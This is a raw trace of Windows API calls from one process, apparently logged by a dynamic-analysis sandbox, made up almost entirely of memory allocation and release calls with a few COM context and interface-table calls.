	[0073.379] ??2@YAPEAX_K@Z () returned 0x2bf480
	[0073.379] GetCurrentThreadId () returned 0xbbc
	[0073.379] realloc (_Block=0x0, _Size=0xc8) returned 0x2bf4e0
	[0073.380] ??2@YAPEAX_K@Z () returned 0x2bf5b0
	[0073.380] malloc (_Size=0x1008) returned 0x2ba4f0
	[0073.380] ??2@YAPEAX_K@Z () returned 0x2bf5f0
	[0073.380] malloc (_Size=0x108) returned 0x2b7d80
	[0073.381] malloc (_Size=0x208) returned 0x2bf7a0
	[0073.381] malloc (_Size=0x200) returned 0x2bf9b0
	[0073.381] malloc (_Size=0x408) returned 0x2bfbc0
	[0073.381] malloc (_Size=0x2008) returned 0x2bb500
	[0073.381] malloc (_Size=0x808) returned 0x2bd510
	[0073.382] malloc (_Size=0x1008) returned 0x2bdd20
	[0073.383] malloc (_Size=0x4008) returned 0x48dfd0
	[0073.383] malloc (_Size=0x2008) returned 0x491fe0
	[0073.386] malloc (_Size=0x4008) returned 0x493ff0
	[0073.387] malloc (_Size=0x108) returned 0x2b7e90
	[0073.387] realloc (_Block=0x0, _Size=0x64) returned 0x2bed30
	[0073.387] realloc (_Block=0x0, _Size=0x64) returned 0x2beda0
	[0073.388] realloc (_Block=0x2beda0, _Size=0x38) returned 0x2beda0
	[0073.391] realloc (_Block=0x2bf5f0, _Size=0x60) returned 0x2bf5f0
	[0073.391] realloc (_Block=0x2bf5f0, _Size=0x90) returned 0x2bf5f0
	[0073.391] realloc (_Block=0x2bf5f0, _Size=0xd8) returned 0x2bf5f0
	[0073.391] realloc (_Block=0x2bf5f0, _Size=0x140) returned 0x2bf5f0
	[0073.391] realloc (_Block=0x2bf5f0, _Size=0x1e0) returned 0x2bf9b0
	[0073.391] realloc (_Block=0x2bf9b0, _Size=0x2d0) returned 0x2bed30
	[0073.392] realloc (_Block=0x2bed30, _Size=0x438) returned 0x4b8080
	[0073.392] realloc (_Block=0x4b8080, _Size=0x650) returned 0x4b8080
	[0073.392] realloc (_Block=0x4b8080, _Size=0x978) returned 0x4b8080
	[0073.392] malloc (_Size=0x4008) returned 0x4b8a10
	[0073.393] realloc (_Block=0x4b8080, _Size=0xe30) returned 0x4bca20
	[0073.393] malloc (_Size=0x12620) returned 0x4bd860
	[0073.395] ??2@YAPEAX_K@Z () returned 0x2bf0b0
	[0073.395] free (_Block=0x4ac050) 
	[0073.395] free (_Block=0x498000) 
	[0073.395] free (_Block=0x48dfd0) 
	[0073.395] free (_Block=0x2bb500) 
	[0073.395] free (_Block=0x2ba4f0) 
	[0073.395] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0073.395] free (_Block=0x4bca20) 
	[0073.395] free (_Block=0x4b8a10) 
	[0073.395] free (_Block=0x4b4070) 
	[0073.396] free (_Block=0x4b0060) 
	[0073.396] free (_Block=0x4a8040) 
	[0073.396] free (_Block=0x4a4030) 
	[0073.396] free (_Block=0x4a0020) 
	[0073.396] free (_Block=0x49c010) 
	[0073.396] free (_Block=0x493ff0) 
	[0073.396] free (_Block=0x491fe0) 
	[0073.396] free (_Block=0x2bdd20) 
	[0073.396] free (_Block=0x2bd510) 
	[0073.398] free (_Block=0x2bfbc0) 
	[0073.398] free (_Block=0x2bf7a0) 
	[0073.398] free (_Block=0x2b7d80) 
	[0073.398] ??2@YAPEAX_K@Z () returned 0x2bf5b0
	[0073.398] ??2@YAPEAX_K@Z () returned 0x2bf610
	[0073.398] malloc (_Size=0x10) returned 0x2bf640
	[0073.398] free (_Block=0x2bf4e0) 
	[0073.401] ??2@YAPEAX_K@Z () returned 0x2bf4e0
	[0073.401] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1fef48 | out: ppv=0x1fef48*=0x39f420) returned 0x0
	[0073.669] ??2@YAPEAX_K@Z () returned 0x2bf560
	[0073.670] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7fefec0a1b0, pUnk=0x2bf560, riid=0x7fedf566340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x2bf598 | out: pdwCookie=0x2bf598*=0x100) returned 0x0
	[0073.670] IUnknown:AddRef (This=0x39f420) returned 0x2
	[0073.670] IUnknown:Release (This=0x39f420) returned 0x1
	[0073.670] ??2@YAPEAX_K@Z () returned 0x4cfe90
	[0073.671] ??2@YAPEAX_K@Z () returned 0x2bf940
	[0073.671] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1fef98 | out: ppv=0x1fef98*=0x39f420) returned 0x0
	[0073.671] IUnknown:Release (This=0x39f420) returned 0x1
	[0073.671] ??2@YAPEAX_K@Z () returned 0x2bfa00
	[0073.671] ISystemDebugEventFire:IsActive (This=0x3b75b0) returned 0x1
	[0073.671] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1fef38 | out: ppv=0x1fef38*=0x39f420) returned 0x0
	[0073.671] IUnknown:Release (This=0x39f420) returned 0x1
	[0073.672] malloc (_Size=0x2e48) returned 0x2ba4f0
	[0073.673] GetCurrentThreadId () returned 0xbbc
	[0073.673] ??2@YAPEAX_K@Z () returned 0x2bfae0
	[0073.674] ??2@YAPEAX_K@Z () returned 0x2bfbc0
	[0073.674] malloc (_Size=0x208) returned 0x2bfca0
	[0073.675] ??2@YAPEAX_K@Z () returned 0x2bd750
	[0073.675] ??2@YAPEAX_K@Z () returned 0x2be0d0
	[0073.675] ??2@YAPEAX_K@Z () returned 0x2bfeb0
	[0073.675] ??2@YAPEAX_K@Z () returned 0x2bff30
	[0073.676] ??2@YAPEAX_K@Z () returned 0x2bea50
	[0073.676] malloc (_Size=0x20) returned 0x2bed40
	[0073.676] malloc (_Size=0x288) returned 0x2bed70
	[0073.676] realloc (_Block=0x0, _Size=0x140) returned 0x4d0810
	[0073.676] realloc (_Block=0x2bed40, _Size=0x40) returned 0x2bf000
	[0073.676] realloc (_Block=0x4d0810, _Size=0x280) returned 0x4d0810
	[0073.676] malloc (_Size=0x508) returned 0x4d0aa0
	[0073.676] realloc (_Block=0x2bf000, _Size=0x80) returned 0x4d0fb0
	[0073.677] realloc (_Block=0x4d0810, _Size=0x500) returned 0x4d1040
	[0073.677] malloc (_Size=0xa08) returned 0x4d1550
	[0073.677] realloc (_Block=0x4d0fb0, _Size=0x100) returned 0x4d0810
	[0073.677] realloc (_Block=0x4d1040, _Size=0xa00) returned 0x4d1f60
	[0073.677] malloc (_Size=0x1408) returned 0x48dfd0
	[0073.678] realloc (_Block=0x4d0810, _Size=0x200) returned 0x4d0810
	[0073.678] realloc (_Block=0x4d1f60, _Size=0x1400) returned 0x48f3e0
	[0073.678] ??2@YAPEAX_K@Z () returned 0x4d0fb0
	[0073.678] ??2@YAPEAX_K@Z () returned 0x4d0a20
	[0073.679] ??2@YAPEAX_K@Z () returned 0x4d1090
	[0073.679] malloc (_Size=0x80) returned 0x4d1140
	[0073.679] malloc (_Size=0x108) returned 0x2b7d80
	[0073.679] ??2@YAPEAX_K@Z () returned 0x4d11d0
	[0073.679] malloc (_Size=0x18) returned 0x2bffb0
	[0073.681] ??2@YAPEAX_K@Z () returned 0x4d12b0
	[0073.681] ??2@YAPEAX_K@Z () returned 0x4d1f60
	[0073.681] malloc (_Size=0x80) returned 0x4d1360
	[0073.681] malloc (_Size=0x108) returned 0x2b7e90
	[0073.682] ??2@YAPEAX_K@Z () returned 0x4d1480
	[0073.686] ??2@YAPEAX_K@Z () returned 0x4d2250
	[0073.686] ??2@YAPEAX_K@Z () returned 0x4d2330
	[0073.687] ??2@YAPEAX_K@Z () returned 0x4d23b0
	[0073.687] malloc (_Size=0x80) returned 0x4d2460
	[0073.687] malloc (_Size=0x108) returned 0x2b80b0
	[0073.687] ??2@YAPEAX_K@Z () returned 0x4d2700
	[0073.687] malloc (_Size=0x18) returned 0x4d1530
	[0073.688] ??2@YAPEAX_K@Z () returned 0x4d27e0
	[0073.688] ??2@YAPEAX_K@Z () returned 0x4d2860
	[0073.688] malloc (_Size=0x80) returned 0x4d2910
	[0073.688] malloc (_Size=0x108) returned 0x2b81c0
	[0073.688] ??2@YAPEAX_K@Z () returned 0x4d29a0
	[0073.688] malloc (_Size=0x30) returned 0x2bf000
	[0073.689] ??2@YAPEAX_K@Z () returned 0x4d2a80
	[0073.689] realloc (_Block=0x0, _Size=0xa0) returned 0x4d2b40
	[0073.690] ??2@YAPEAX_K@Z () returned 0x2bed40
	[0073.690] ??2@YAPEAX_K@Z () returned 0x4d2bf0
	[0073.690] realloc (_Block=0x0, _Size=0xc8) returned 0x4d2c20
	[0073.691] ??2@YAPEAX_K@Z () returned 0x4d2cf0
	[0073.691] malloc (_Size=0x1008) returned 0x4907f0
	[0073.691] ??2@YAPEAX_K@Z () returned 0x4d2d30
	[0073.691] ??2@YAPEAX_K@Z () returned 0x4d2bf0
	[0073.692] free (_Block=0x4907f0) 
	[0073.692] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0073.692] free (_Block=0x2bf040) 
	[0073.692] free (_Block=0x4d2d30) 
	[0073.692] free (_Block=0x491a10) 
	[0073.692] free (_Block=0x491800) 
	[0073.692] free (_Block=0x2b82d0) 
	[0073.692] ??2@YAPEAX_K@Z () returned 0x4d2cf0
	[0073.692] ??2@YAPEAX_K@Z () returned 0x4d2d50
	[0073.693] ??2@YAPEAX_K@Z () returned 0x4d2c20
	[0073.693] ??2@YAPEAX_K@Z () returned 0x4d2e30
	[0073.693] malloc (_Size=0x18) returned 0x2bf040
	[0073.693] ??2@YAPEAX_K@Z () returned 0x4d2f10
	[0073.693] malloc (_Size=0x80) returned 0x4907f0
	[0073.693] malloc (_Size=0x108) returned 0x2b82d0
	[0073.694] ??2@YAPEAX_K@Z () returned 0x490880
	[0073.694] malloc (_Size=0x80) returned 0x490930
	[0073.694] malloc (_Size=0x108) returned 0x2b83e0
	[0073.694] realloc (_Block=0x0, _Size=0xc8) returned 0x4909c0
	[0073.695] ??2@YAPEAX_K@Z () returned 0x4d2ca0
	[0073.695] malloc (_Size=0x1008) returned 0x490a90
	[0073.695] ??2@YAPEAX_K@Z () returned 0x491aa0
	[0073.695] ??2@YAPEAX_K@Z () returned 0x491df0
	[0073.695] free (_Block=0x490a90) 
	[0073.695] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0073.695] free (_Block=0x491c50) 
	[0073.696] free (_Block=0x491aa0) 
	[0073.696] free (_Block=0x4922a0) 
	[0073.696] free (_Block=0x492090) 
	[0073.696] free (_Block=0x2b84f0) 
	[0073.696] ??2@YAPEAX_K@Z () returned 0x490a90
	[0073.696] ??2@YAPEAX_K@Z () returned 0x490af0
	[0073.697] ??2@YAPEAX_K@Z () returned 0x490bd0
	[0073.697] malloc (_Size=0x30) returned 0x4d2ca0
	[0073.697] ??2@YAPEAX_K@Z () returned 0x490cb0
	[0073.697] malloc (_Size=0x18) returned 0x4909c0
	[0073.697] ??2@YAPEAX_K@Z () returned 0x4909e0
	[0073.697] malloc (_Size=0x80) returned 0x490d90
	[0073.698] malloc (_Size=0x108) returned 0x2b84f0
	[0073.698] ??2@YAPEAX_K@Z () returned 0x490e20
	[0073.698] ??2@YAPEAX_K@Z () returned 0x490e90
	[0073.699] ??2@YAPEAX_K@Z () returned 0x490f10
	[0073.699] malloc (_Size=0x208) returned 0x490f90
	[0073.699] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0073.700] ??2@YAPEAX_K@Z () returned 0x491220
	[0073.700] ??2@YAPEAX_K@Z () returned 0x4912e0
	[0073.701] ??2@YAPEAX_K@Z () returned 0x491420
	[0073.701] ??2@YAPEAX_K@Z () returned 0x491560
	[0073.701] ??2@YAPEAX_K@Z () returned 0x4915f0
	[0073.701] ??2@YAPEAX_K@Z () returned 0x491680
	[0073.701] malloc (_Size=0x80) returned 0x491730
	[0073.701] malloc (_Size=0x108) returned 0x2b8600
	[0073.788] ??2@YAPEAX_K@Z () returned 0x491aa0
	[0073.788] ??2@YAPEAX_K@Z () returned 0x491b50
	[0073.788] malloc (_Size=0x80) returned 0x492370
	[0073.788] malloc (_Size=0x108) returned 0x2b8710
	[0073.789] realloc (_Block=0x0, _Size=0x64) returned 0x491c00
	[0073.789] realloc (_Block=0x0, _Size=0x2ac) returned 0x492400
	[0073.790] ??2@YAPEAX_K@Z () returned 0x492400
	[0073.790] free (_Block=0x491c00) 
	[0073.790] ??2@YAPEAX_K@Z () returned 0x492680
	[0073.791] ??2@YAPEAX_K@Z () returned 0x492730
	[0073.792] ??2@YAPEAX_K@Z () returned 0x4929f0
	[0073.792] ??2@YAPEAX_K@Z () returned 0x492ad0
	[0073.792] malloc (_Size=0x80) returned 0x494aa0
	[0073.793] malloc (_Size=0x108) returned 0x2b8820
	[0073.793] ??2@YAPEAX_K@Z () returned 0x491c00
	[0073.794] ??2@YAPEAX_K@Z () returned 0x491c30
	[0073.795] ??2@YAPEAX_K@Z () returned 0x494b30
	[0073.795] ??2@YAPEAX_K@Z () returned 0x494b60
	[0073.796] ??2@YAPEAX_K@Z () returned 0x494b90
	[0073.796] ??2@YAPEAX_K@Z () returned 0x494bc0
	[0073.796] ??2@YAPEAX_K@Z () returned 0x495540
	[0073.797] ??2@YAPEAX_K@Z () returned 0x495570
	[0073.797] ??2@YAPEAX_K@Z () returned 0x4955a0
	[0073.798] ??2@YAPEAX_K@Z () returned 0x4955d0
	[0073.799] ??2@YAPEAX_K@Z () returned 0x495600
	[0073.801] ??2@YAPEAX_K@Z () returned 0x495630
	[0073.803] ??2@YAPEAX_K@Z () returned 0x495660
	[0073.805] ??2@YAPEAX_K@Z () returned 0x495690
	[0073.806] ??2@YAPEAX_K@Z () returned 0x4956c0
	[0073.808] ??2@YAPEAX_K@Z () returned 0x4956f0
	[0073.810] ??2@YAPEAX_K@Z () returned 0x495720
	[0073.811] ??2@YAPEAX_K@Z () returned 0x495780
	[0073.814] ??2@YAPEAX_K@Z () returned 0x4957b0
	[0073.815] ??2@YAPEAX_K@Z () returned 0x4957e0
	[0073.817] ??2@YAPEAX_K@Z () returned 0x495810
	[0073.819] ??2@YAPEAX_K@Z () returned 0x495840
	[0073.820] ??2@YAPEAX_K@Z () returned 0x495870
	[0073.866] ??2@YAPEAX_K@Z () returned 0x4958a0
	[0073.868] ??2@YAPEAX_K@Z () returned 0x4958d0
	[0073.869] ??2@YAPEAX_K@Z () returned 0x495900
	[0073.871] ??2@YAPEAX_K@Z () returned 0x495930
	[0073.873] ??2@YAPEAX_K@Z () returned 0x495960
	[0073.875] ??2@YAPEAX_K@Z () returned 0x495990
	[0073.876] ??2@YAPEAX_K@Z () returned 0x4959c0
	[0073.878] ??2@YAPEAX_K@Z () returned 0x4959f0
	[0073.880] ??2@YAPEAX_K@Z () returned 0x495a20
	[0073.881] ??2@YAPEAX_K@Z () returned 0x495a50
	[0073.883] ??2@YAPEAX_K@Z () returned 0x495a80
	[0073.885] ??2@YAPEAX_K@Z () returned 0x495ab0
	[0073.886] ??2@YAPEAX_K@Z () returned 0x495ae0
	[0073.887] ??2@YAPEAX_K@Z () returned 0x495f50
	[0073.889] ??2@YAPEAX_K@Z () returned 0x495b10
	[0073.890] ??2@YAPEAX_K@Z () returned 0x495b40
	[0073.892] ??2@YAPEAX_K@Z () returned 0x495b70
	[0073.894] ??2@YAPEAX_K@Z () returned 0x495ba0
	[0073.896] ??2@YAPEAX_K@Z () returned 0x495bd0
	[0073.897] ??2@YAPEAX_K@Z () returned 0x495c00
	[0073.899] ??2@YAPEAX_K@Z () returned 0x495c30
	[0073.952] ??2@YAPEAX_K@Z () returned 0x495c60
	[0073.954] ??2@YAPEAX_K@Z () returned 0x495c90
	[0073.956] ??2@YAPEAX_K@Z () returned 0x495cc0
	[0073.957] ??2@YAPEAX_K@Z () returned 0x495cf0
	[0073.959] ??2@YAPEAX_K@Z () returned 0x495d20
	[0073.961] ??2@YAPEAX_K@Z () returned 0x495d50
	[0073.962] ??2@YAPEAX_K@Z () returned 0x495d80
	[0073.964] ??2@YAPEAX_K@Z () returned 0x495db0
	[0073.966] ??2@YAPEAX_K@Z () returned 0x495de0
	[0073.968] ??2@YAPEAX_K@Z () returned 0x495e10
	[0073.969] ??2@YAPEAX_K@Z () returned 0x495e40
	[0073.971] ??2@YAPEAX_K@Z () returned 0x495e70
	[0073.981] ??2@YAPEAX_K@Z () returned 0x495ea0
	[0073.982] ??2@YAPEAX_K@Z () returned 0x495ed0
	[0073.988] ??2@YAPEAX_K@Z () returned 0x495f00
	[0073.989] ??2@YAPEAX_K@Z () returned 0x496900
	[0073.991] ??2@YAPEAX_K@Z () returned 0x496930
	[0073.993] ??2@YAPEAX_K@Z () returned 0x496960
	[0073.995] ??2@YAPEAX_K@Z () returned 0x496990
	[0074.070] ??2@YAPEAX_K@Z () returned 0x4969c0
	[0074.073] ??2@YAPEAX_K@Z () returned 0x4969f0
	[0074.074] ??2@YAPEAX_K@Z () returned 0x496a20
	[0074.076] ??2@YAPEAX_K@Z () returned 0x496a50
	[0074.076] ??2@YAPEAX_K@Z () returned 0x4970d0
	[0074.078] ??2@YAPEAX_K@Z () returned 0x496a80
	[0074.080] ??2@YAPEAX_K@Z () returned 0x496ab0
	[0074.081] ??2@YAPEAX_K@Z () returned 0x496ae0
	[0074.082] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1f77b8 | out: ppv=0x1f77b8*=0x39f420) returned 0x0
	[0074.084] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.084] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.084] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.084] free (_Block=0x491c70) 
	[0074.084] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.085] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.085] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.085] free (_Block=0x2bf040) 
	[0074.085] free (_Block=0x490930) 
	[0074.085] free (_Block=0x2b83e0) 
	[0074.085] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.085] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.085] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.085] free (_Block=0x491e20) 
	[0074.085] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.085] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.085] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.085] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.085] free (_Block=0x2bffb0) 
	[0074.085] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.085] free (_Block=0x4d1140) 
	[0074.085] free (_Block=0x2b7d80) 
	[0074.085] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.085] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.086] MulDiv (nNumber=111, nNumerator=100, nDenominator=512) returned 22
	[0074.086] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.086] GetTickCount () returned 0x233bc
	[0074.087] ??2@YAPEAX_K@Z () returned 0x496b10
	[0074.089] ??2@YAPEAX_K@Z () returned 0x496b40
	[0074.090] ??2@YAPEAX_K@Z () returned 0x496b70
	[0074.093] ??2@YAPEAX_K@Z () returned 0x496ba0
	[0074.094] ??2@YAPEAX_K@Z () returned 0x496bd0
	[0074.096] ??2@YAPEAX_K@Z () returned 0x496c00
	[0074.098] ??2@YAPEAX_K@Z () returned 0x496c30
	[0074.100] ??2@YAPEAX_K@Z () returned 0x496c60
	[0074.101] ??2@YAPEAX_K@Z () returned 0x496c90
	[0074.162] ??2@YAPEAX_K@Z () returned 0x496cc0
	[0074.184] ??2@YAPEAX_K@Z () returned 0x496cf0
	[0074.185] ??2@YAPEAX_K@Z () returned 0x496d20
	[0074.188] ??2@YAPEAX_K@Z () returned 0x496d50
	[0074.189] ??2@YAPEAX_K@Z () returned 0x496d80
	[0074.191] ??2@YAPEAX_K@Z () returned 0x496db0
	[0074.193] ??2@YAPEAX_K@Z () returned 0x496de0
	[0074.195] ??2@YAPEAX_K@Z () returned 0x496e10
	[0074.196] ??2@YAPEAX_K@Z () returned 0x496e40
	[0074.198] ??2@YAPEAX_K@Z () returned 0x496e70
	[0074.200] ??2@YAPEAX_K@Z () returned 0x496ea0
	[0074.201] ??2@YAPEAX_K@Z () returned 0x496ed0
	[0074.204] ??2@YAPEAX_K@Z () returned 0x496f00
	[0074.205] ??2@YAPEAX_K@Z () returned 0x496f30
	[0074.206] ??2@YAPEAX_K@Z () returned 0x496f60
	[0074.209] ??2@YAPEAX_K@Z () returned 0x496f90
	[0074.210] ??2@YAPEAX_K@Z () returned 0x496fc0
	[0074.211] ??2@YAPEAX_K@Z () returned 0x496ff0
	[0074.213] ??2@YAPEAX_K@Z () returned 0x497020
	[0074.214] ??2@YAPEAX_K@Z () returned 0x497050
	[0074.215] ??2@YAPEAX_K@Z () returned 0x497080
	[0074.270] ??2@YAPEAX_K@Z () returned 0x497a80
	[0074.272] ??2@YAPEAX_K@Z () returned 0x497ab0
	[0074.273] ??2@YAPEAX_K@Z () returned 0x497ae0
	[0074.274] ??2@YAPEAX_K@Z () returned 0x497b10
	[0074.275] ??2@YAPEAX_K@Z () returned 0x497b40
	[0074.276] ??2@YAPEAX_K@Z () returned 0x497b70
	[0074.277] ??2@YAPEAX_K@Z () returned 0x497ba0
	[0074.278] ??2@YAPEAX_K@Z () returned 0x497bd0
	[0074.279] ??2@YAPEAX_K@Z () returned 0x497c00
	[0074.279] ??2@YAPEAX_K@Z () returned 0x497c30
	[0074.280] ??2@YAPEAX_K@Z () returned 0x497c60
	[0074.280] ??2@YAPEAX_K@Z () returned 0x497c90
	[0074.281] ??2@YAPEAX_K@Z () returned 0x497cc0
	[0074.281] ??2@YAPEAX_K@Z () returned 0x497cf0
	[0074.282] ??2@YAPEAX_K@Z () returned 0x497d20
	[0074.283] ??2@YAPEAX_K@Z () returned 0x497d50
	[0074.283] ??2@YAPEAX_K@Z () returned 0x497d80
	[0074.283] ??2@YAPEAX_K@Z () returned 0x497db0
	[0074.284] ??2@YAPEAX_K@Z () returned 0x497de0
	[0074.284] ??2@YAPEAX_K@Z () returned 0x497e10
	[0074.285] ??2@YAPEAX_K@Z () returned 0x497e40
	[0074.285] ??2@YAPEAX_K@Z () returned 0x497e70
	[0074.286] ??2@YAPEAX_K@Z () returned 0x497ea0
	[0074.286] ??2@YAPEAX_K@Z () returned 0x497ed0
	[0074.287] ??2@YAPEAX_K@Z () returned 0x497f00
	[0074.287] ??2@YAPEAX_K@Z () returned 0x497f30
	[0074.288] ??2@YAPEAX_K@Z () returned 0x497f60
	[0074.288] ??2@YAPEAX_K@Z () returned 0x497f90
	[0074.289] ??2@YAPEAX_K@Z () returned 0x492b80
	[0074.289] malloc (_Size=0x208) returned 0x4d1090
	[0074.290] ??2@YAPEAX_K@Z () returned 0x490e90
	[0074.291] ??2@YAPEAX_K@Z () returned 0x4d2bf0
	[0074.291] ??2@YAPEAX_K@Z () returned 0x490880
	[0074.291] ??2@YAPEAX_K@Z () returned 0x492c30
	[0074.291] ??2@YAPEAX_K@Z () returned 0x492ce0
	[0074.291] malloc (_Size=0x80) returned 0x490910
	[0074.291] malloc (_Size=0x108) returned 0x2b7d80
	[0074.292] ??2@YAPEAX_K@Z () returned 0x492d90
	[0074.292] malloc (_Size=0x80) returned 0x490a90
	[0074.292] malloc (_Size=0x108) returned 0x2b83e0
	[0074.293] ??2@YAPEAX_K@Z () returned 0x498250
	[0074.294] ??2@YAPEAX_K@Z () returned 0x497f90
	[0074.294] ??2@YAPEAX_K@Z () returned 0x492e40
	[0074.295] ??2@YAPEAX_K@Z () returned 0x497f90
	[0074.295] ??2@YAPEAX_K@Z () returned 0x497fc0
	[0074.295] ??2@YAPEAX_K@Z () returned 0x497fc0
	[0074.296] ??2@YAPEAX_K@Z () returned 0x497ff0
	[0074.296] ??2@YAPEAX_K@Z () returned 0x498020
	[0074.297] ??2@YAPEAX_K@Z () returned 0x498020
	[0074.297] ??2@YAPEAX_K@Z () returned 0x498050
	[0074.298] ??2@YAPEAX_K@Z () returned 0x498080
	[0074.298] ??2@YAPEAX_K@Z () returned 0x498080
	[0074.299] ??2@YAPEAX_K@Z () returned 0x4980b0
	[0074.299] ??2@YAPEAX_K@Z () returned 0x4980e0
	[0074.300] ??2@YAPEAX_K@Z () returned 0x4980e0
	[0074.300] ??2@YAPEAX_K@Z () returned 0x498110
	[0074.301] ??2@YAPEAX_K@Z () returned 0x498140
	[0074.301] ??2@YAPEAX_K@Z () returned 0x498140
	[0074.302] ??2@YAPEAX_K@Z () returned 0x498170
	[0074.302] ??2@YAPEAX_K@Z () returned 0x4981a0
	[0074.309] ??2@YAPEAX_K@Z () returned 0x4981a0
	[0074.310] ??2@YAPEAX_K@Z () returned 0x4981d0
	[0074.310] ??2@YAPEAX_K@Z () returned 0x498200
	[0074.369] ??2@YAPEAX_K@Z () returned 0x498200
	[0074.369] ??2@YAPEAX_K@Z () returned 0x498c00
	[0074.370] ??2@YAPEAX_K@Z () returned 0x498c30
	[0074.370] ??2@YAPEAX_K@Z () returned 0x498c30
	[0074.371] ??2@YAPEAX_K@Z () returned 0x498c60
	[0074.371] ??2@YAPEAX_K@Z () returned 0x498c90
	[0074.372] ??2@YAPEAX_K@Z () returned 0x498c90
	[0074.372] ??2@YAPEAX_K@Z () returned 0x498cc0
	[0074.373] ??2@YAPEAX_K@Z () returned 0x498cf0
	[0074.373] ??2@YAPEAX_K@Z () returned 0x498cf0
	[0074.374] ??2@YAPEAX_K@Z () returned 0x498d20
	[0074.374] ??2@YAPEAX_K@Z () returned 0x498d50
	[0074.375] ??2@YAPEAX_K@Z () returned 0x498d50
	[0074.376] ??2@YAPEAX_K@Z () returned 0x498d80
	[0074.376] ??2@YAPEAX_K@Z () returned 0x498db0
	[0074.377] ??2@YAPEAX_K@Z () returned 0x498db0
	[0074.377] ??2@YAPEAX_K@Z () returned 0x498de0
	[0074.378] ??2@YAPEAX_K@Z () returned 0x4993d0
	[0074.378] ??2@YAPEAX_K@Z () returned 0x498e10
	[0074.379] ??2@YAPEAX_K@Z () returned 0x498e10
	[0074.379] ??2@YAPEAX_K@Z () returned 0x498e40
	[0074.379] ??2@YAPEAX_K@Z () returned 0x498e70
	[0074.380] ??2@YAPEAX_K@Z () returned 0x498e70
	[0074.380] ??2@YAPEAX_K@Z () returned 0x498ea0
	[0074.381] ??2@YAPEAX_K@Z () returned 0x498ed0
	[0074.381] ??2@YAPEAX_K@Z () returned 0x498ed0
	[0074.382] ??2@YAPEAX_K@Z () returned 0x498f00
	[0074.382] ??2@YAPEAX_K@Z () returned 0x498f30
	[0074.383] ??2@YAPEAX_K@Z () returned 0x498f30
	[0074.384] ??2@YAPEAX_K@Z () returned 0x498f60
	[0074.384] ??2@YAPEAX_K@Z () returned 0x498f90
	[0074.384] ??2@YAPEAX_K@Z () returned 0x498f90
	[0074.385] ??2@YAPEAX_K@Z () returned 0x498fc0
	[0074.385] ??2@YAPEAX_K@Z () returned 0x498ff0
	[0074.386] ??2@YAPEAX_K@Z () returned 0x498ff0
	[0074.386] ??2@YAPEAX_K@Z () returned 0x499020
	[0074.387] ??2@YAPEAX_K@Z () returned 0x499050
	[0074.387] ??2@YAPEAX_K@Z () returned 0x499050
	[0074.388] ??2@YAPEAX_K@Z () returned 0x499080
	[0074.388] ??2@YAPEAX_K@Z () returned 0x4990b0
	[0074.389] ??2@YAPEAX_K@Z () returned 0x4990b0
	[0074.389] ??2@YAPEAX_K@Z () returned 0x4990e0
	[0074.389] ??2@YAPEAX_K@Z () returned 0x499110
	[0074.390] ??2@YAPEAX_K@Z () returned 0x499110
	[0074.390] ??2@YAPEAX_K@Z () returned 0x499140
	[0074.391] ??2@YAPEAX_K@Z () returned 0x499170
	[0074.391] ??2@YAPEAX_K@Z () returned 0x499170
	[0074.392] ??2@YAPEAX_K@Z () returned 0x4991a0
	[0074.392] ??2@YAPEAX_K@Z () returned 0x4991d0
	[0074.393] ??2@YAPEAX_K@Z () returned 0x4991d0
	[0074.394] ??2@YAPEAX_K@Z () returned 0x499200
	[0074.394] ??2@YAPEAX_K@Z () returned 0x499230
	[0074.394] ??2@YAPEAX_K@Z () returned 0x499230
	[0074.395] ??2@YAPEAX_K@Z () returned 0x499260
	[0074.395] ??2@YAPEAX_K@Z () returned 0x499d50
	[0074.396] ??2@YAPEAX_K@Z () returned 0x499290
	[0074.396] ??2@YAPEAX_K@Z () returned 0x499290
	[0074.397] ??2@YAPEAX_K@Z () returned 0x4992c0
	[0074.397] ??2@YAPEAX_K@Z () returned 0x4992f0
	[0074.398] ??2@YAPEAX_K@Z () returned 0x4992f0
	[0074.398] ??2@YAPEAX_K@Z () returned 0x499320
	[0074.399] ??2@YAPEAX_K@Z () returned 0x499350
	[0074.399] ??2@YAPEAX_K@Z () returned 0x499350
